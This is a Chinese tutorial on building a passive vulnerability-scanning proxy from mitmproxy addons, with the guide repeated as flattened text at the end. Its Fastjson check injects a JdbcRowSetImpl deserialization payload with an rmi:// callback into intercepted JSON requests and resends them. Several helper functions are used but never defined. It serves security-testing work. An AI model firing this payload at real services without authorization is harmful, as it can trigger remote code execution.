基于mitmproxy的被动扫描代理
字数 1120 2025-08-18 11:39:00

基于mitmproxy的被动扫描代理开发指南

1. mitmproxy简介

mitmproxy是一款用Python编写的功能完善的代理工具,主要特点包括:

  • 支持拦截HTTP和HTTPS请求和响应
  • 允许即时修改流量内容
  • 提供Python API用于编写自定义插件
  • 可作为交互式中间人代理工具使用

2. 开发环境准备

2.1 安装mitmproxy

git clone https://github.com/mitmproxy/mitmproxy.git
cd mitmproxy
./dev.sh

当前使用的版本为5.0.0.dev(注意:5.0.5 Dev版本已不再维护libmproxy模块)

2.2 开发模式

现代mitmproxy版本推荐使用addons插件模块(内联脚本)进行扩展,调用方式:

mitmdump -s ./anatomy.py

3. mitmproxy插件基础

3.1 基本插件结构

from mitmproxy import ctx

class Counter:
    def __init__(self):
        self.num = 0
    
    def request(self, flow):
        self.num = self.num + 1
        ctx.log.info("We've seen %d flows" % self.num)

addons = [
    Counter()
]

3.2 关键概念

  • flow参数:来自mitmporxy/http.py中的HTTPflow数据流类
  • 请求对象:通过flow.request访问,类型为HTTPRequest
  • 响应对象:通过flow.response访问,类型为HTTPResponse

4. 被动扫描代理实现

4.1 整体架构

采用"被动代理获取数据流 → 扫描器扫描"的思路:

  1. 被动扫描器获取数据流
  2. 将数据流导入扫描进程
  3. 扫描进程进行扫描并输出结果

使用双进程模型:

  • 代理进程:负责流量捕获
  • 扫描进程:负责漏洞检测
  • 进程间通信:使用Queue队列

4.2 核心代码实现

4.2.1 主程序框架

from mitmproxy.tools._main import run
import threading
import time
from queue import Queue

request_queue = Queue()

# 扫描进程
def start_scan():
    while True:
        if not request_queue.empty():
            print("scan", request_queue.get())
        time.sleep(1)

if __name__ == '__main__':
    scanner = threading.Thread(target=start_scan)
    scanner.setDaemon(True)  # 守护进程
    scanner.start()
    
    args = ['--listen-host', '127.0.0.1', '--listen-port', '8788']
    print("Proxy server listening at http://127.0.0.1:8788")
    mitmdump(args)

4.2.2 自定义DumpMaster

class DumpMaster(master.Master):
    def __init__(self, options: options.Options, 
                 with_termlog=False, 
                 with_dumper=False,
                 with_handle_request=True,
                 with_fast_json_check=True):
        super().__init__(options)
        self.errorcheck = ErrorCheck()
        
        if with_termlog:
            self.addons.add(termlog.TermLog(), termstatus.TermStatus())
        
        self.addons.add(*addons.default_addons())
        
        if with_dumper:
            self.addons.add(dumper.Dumper())
            
        if with_handle_request:
            self.addons.add(HandleRequest(request_queue))  # 添加请求处理插件
            
        if with_fast_json_check:
            self.addons.add(FastJsonCheck())  # 添加fastjson漏洞检测插件
            
        self.addons.add(
            keepserving.KeepServing(),
            readfile.ReadFileStdin(),
            self.errorcheck
        )

4.2.3 请求处理插件

from mitmproxy import ctx
from mitmproxy.http import HTTPFlow
from gevent.queue import Queue

class HandleRequest:
    def __init__(self, request_queue: Queue):
        self.num = 0
        self.request_queue = request_queue
    
    def request(self, flow: HTTPFlow):
        self.num = self.num + 1
        self.request_queue.put(flow.request.url)  # 将请求URL放入队列
    
    def response(self, flow: HTTPFlow):
        self.num = self.num + 1

5. 插件化漏洞扫描实现

5.1 Fastjson漏洞检测插件

from mitmproxy.http import HTTPFlow
import json
from urllib import parse
import copy
import requests
import time

class FastJsonCheck:
    def __init__(self):
        self.num = 0
    
    def request(self, flow: HTTPFlow):
        self.num = self.num + 1
        req = ObjectDict()
        req.target = flow.request.url
        content_type = flow.request.headers.get("Content-Type")
        
        if "application/json" in content_type:
            print("start check fastjson vuln")
            req.headers = flow.request.headers
            req.method = flow.request.method
            data = flow.request.content.decode('utf-8')
            req.data = data
            req_list = [req]
            
            for req in req_list:
                if req.get('data'):
                    check_data(req)
                check_target(req)
    
    def response(self, flow: HTTPFlow):
        self.num = self.num + 1

# Fastjson检测payload
fastjson_payload = '{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://[qtn3aviq63by76utx7jcwrpxtozen3]/Exploit","autoCommit":true}}'

# DNS服务地址
dns_service_address = 'http://xxx.xxx.xxx.xxx:5000'

def get_random_dns_server():
    for i in range(3):
        try:
            resp = requests.post('%s/genname' % dns_service_address, 
                               json={'callback': '', 'info': ''}, 
                               timeout=(3, 6))
            return str(resp.json()['name'])
        except:
            print('Error when get dns server:')
            return None

def has_query_log_for_dns(dns_server):
    for i in range(3):
        try:
            resp = requests.get('%s/success/%s' % (dns_service_address, dns_server), 
                              timeout=(3, 6))
            return resp.json()['success']
        except:
            print('Error when verify dns server:')
            return None

def check_data(req_info):
    data = req_info.data
    content_type = req_info.headers.get("Content-Type", "application/x-www-form-urlencoded")
    is_json = 'json' in content_type or 'javascript' in content_type
    
    if not is_json:
        data_dict = form2dict(data)
    else:
        data_dict = json.loads(data)
    
    for x in iter_dict(data_dict, is_json):
        copy_req = copy.deepcopy(req_info)
        if is_json:
            copy_req.data = json.dumps(x)
        else:
            copy_req.data = x
        
        dns_server = get_random_dns_server()
        copy_req.data = copy_req.data.replace("[qtn3aviq63by76utx7jcwrpxtozen3]", dns_server)
        send_req(copy_req)
        time.sleep(1.5)
        
        if has_query_log_for_dns(dns_server):
            print("[success] found fastjson vul\n{}\n".format(copy_req))

5.2 检测原理

  1. 识别Content-Type为application/json的请求
  2. 构造Fastjson反序列化payload
  3. 使用DNSLog技术进行漏洞验证
  4. 通过检查DNS查询日志判断漏洞是否存在

6. 部署与运行

  1. 启动代理服务器:
python3 myproxy.py
  1. 配置客户端使用代理:
  • 地址:127.0.0.1
  • 端口:8788
  1. 观察扫描结果:
  • 控制台会输出检测到的漏洞信息
  • Fastjson漏洞会显示"[success] found fastjson vuln"

7. 扩展思路

  1. 支持更多漏洞类型的检测:

    • XXE漏洞
    • SQL注入
    • XSS等
  2. 增强功能:

    • 添加报告生成模块
    • 支持自定义规则
    • 实现自动化扫描
  3. 性能优化:

    • 多线程处理
    • 请求去重
    • 智能调度

8. 参考资源

  1. GitHub - w-digital-scanner/w13scan: Passive Security Scanner
  2. mitmproxy官方文档
  3. 《HTTP权威指南》

通过本指南,您可以基于mitmproxy开发功能强大的被动扫描代理,实现灵活的网络流量分析和漏洞检测。

基于mitmproxy的被动扫描代理开发指南 1. mitmproxy简介 mitmproxy是一款用Python编写的功能完善的代理工具,主要特点包括: 支持拦截HTTP和HTTPS请求和响应 允许即时修改流量内容 提供Python API用于编写自定义插件 可作为交互式中间人代理工具使用 2. 开发环境准备 2.1 安装mitmproxy 当前使用的版本为5.0.0.dev(注意:5.0.5 Dev版本已不再维护libmproxy模块) 2.2 开发模式 现代mitmproxy版本推荐使用addons插件模块(内联脚本)进行扩展,调用方式: 3. mitmproxy插件基础 3.1 基本插件结构 3.2 关键概念 flow参数 :来自 mitmporxy/http.py 中的HTTPflow数据流类 请求对象 :通过 flow.request 访问,类型为HTTPRequest 响应对象 :通过 flow.response 访问,类型为HTTPResponse 4. 被动扫描代理实现 4.1 整体架构 采用"被动代理获取数据流 → 扫描器扫描"的思路: 被动扫描器获取数据流 将数据流导入扫描进程 扫描进程进行扫描并输出结果 使用双进程模型: 代理进程:负责流量捕获 扫描进程:负责漏洞检测 进程间通信:使用Queue队列 4.2 核心代码实现 4.2.1 主程序框架 4.2.2 自定义DumpMaster 4.2.3 请求处理插件 5. 插件化漏洞扫描实现 5.1 Fastjson漏洞检测插件 5.2 检测原理 识别Content-Type为application/json的请求 构造Fastjson反序列化payload 使用DNSLog技术进行漏洞验证 通过检查DNS查询日志判断漏洞是否存在 6. 部署与运行 启动代理服务器: 配置客户端使用代理: 地址:127.0.0.1 端口:8788 观察扫描结果: 控制台会输出检测到的漏洞信息 Fastjson漏洞会显示"[ success ] found fastjson vuln" 7. 扩展思路 支持更多漏洞类型的检测: XXE漏洞 SQL注入 XSS等 增强功能: 添加报告生成模块 支持自定义规则 实现自动化扫描 性能优化: 多线程处理 请求去重 智能调度 8. 参考资源 GitHub - w-digital-scanner/w13scan : Passive Security Scanner mitmproxy官方文档 《HTTP权威指南》 通过本指南,您可以基于mitmproxy开发功能强大的被动扫描代理,实现灵活的网络流量分析和漏洞检测。